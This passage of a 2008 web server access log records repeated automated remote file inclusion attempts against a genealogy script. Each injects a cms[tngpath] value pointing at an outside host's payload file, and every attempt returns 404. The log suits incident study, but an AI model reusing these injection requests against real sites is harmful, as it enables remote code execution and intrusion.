212.239.21.26 - - [08/Jun/2008:22:50:45 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.198.149.178 - - [08/Jun/2008:22:50:53 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.198.149.178 - - [08/Jun/2008:22:50:53 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:51:14 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:51:19 -0700] "GET /logs/access_080414.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:51:47 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:51:47 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:22:52:11 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:53:48 -0700] "GET /logs/access_080407.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:53:49 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:53:49 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.198.149.178 - - [08/Jun/2008:22:54:25 -0700] "GET /logs/access_080407.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.198.149.178 - - [08/Jun/2008:22:54:25 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.198.149.178 - - [08/Jun/2008:22:54:25 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/hist